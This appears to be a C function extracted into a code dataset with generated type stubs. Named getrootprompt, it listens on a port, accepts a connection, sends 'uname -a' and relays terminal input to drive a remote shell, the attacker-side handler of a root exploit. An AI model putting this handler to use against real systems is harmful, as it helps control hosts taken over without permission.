
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {int sin_zero; TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int fd_set ;


 int AF_INET ;
 scalar_t__ EAGAIN ;
 scalar_t__ EWOULDBLOCK ;
 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int INADDR_ANY ;
 int LISTENPORT ;
 int SOCK_STREAM ;
 int accept (int,struct sockaddr*,int*) ;
 int bind (int,struct sockaddr*,int) ;
 int close (int) ;
 scalar_t__ errno ;
 int htons (int ) ;
 int listen (int,int) ;
 int memset (int *,int ,int) ;
 int printf (char*) ;
 int read (int,char*,int) ;
 scalar_t__ select (int,int *,int *,int *,int *) ;
 int socket (int ,int ,int ) ;
 int write (int,char*,int) ;
 int writesocket (int,char*) ;

void getrootprompt() {
 int sockfd,sin_size,tmpsock,i;
 struct sockaddr_in my_addr,their_addr;
 char szBuffer[1024];
 if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
  printf("Error creating listening socket\n");
  return;
 }
 my_addr.sin_family = AF_INET;
 my_addr.sin_port = htons(LISTENPORT);
 my_addr.sin_addr.s_addr = INADDR_ANY;
 memset(&(my_addr.sin_zero), 0, 8);
 if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) {
  printf("Error binding listening socket\n");
  return;
 }
 if (listen(sockfd, 1) == -1) {
  printf("Error listening on listening socket\n");
  return;
 }
 sin_size = sizeof(struct sockaddr_in);
 if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) {
  printf("Error accepting on listening socket\n");
  return;
 }
 writesocket(tmpsock,"uname -a\n");
 while(1) {
  fd_set readfs;
  FD_ZERO(&readfs);
  FD_SET(0,&readfs);
  FD_SET(tmpsock,&readfs);
  if(select(tmpsock+1,&readfs,((void*)0),((void*)0),((void*)0))) {
   int cnt;
   char buf[1024];
   if (FD_ISSET(0,&readfs)) {
    if ((cnt=read(0,buf,1024)) < 1) {
     if(errno==EWOULDBLOCK || errno==EAGAIN) continue;
                   else {
      printf("Connection closed\n");
      return;
     }
    }
    write(tmpsock,buf,cnt);
   }
   if (FD_ISSET(tmpsock,&readfs)) {
    if ((cnt=read(tmpsock,buf,1024)) < 1) {
     if(errno==EWOULDBLOCK || errno==EAGAIN) continue;
                   else {
      printf("Connection closed\n");
      return;
     }
    }
    write(1,buf,cnt);
   }
  }
 }
 close(tmpsock);
 close(sockfd);
 return;
}
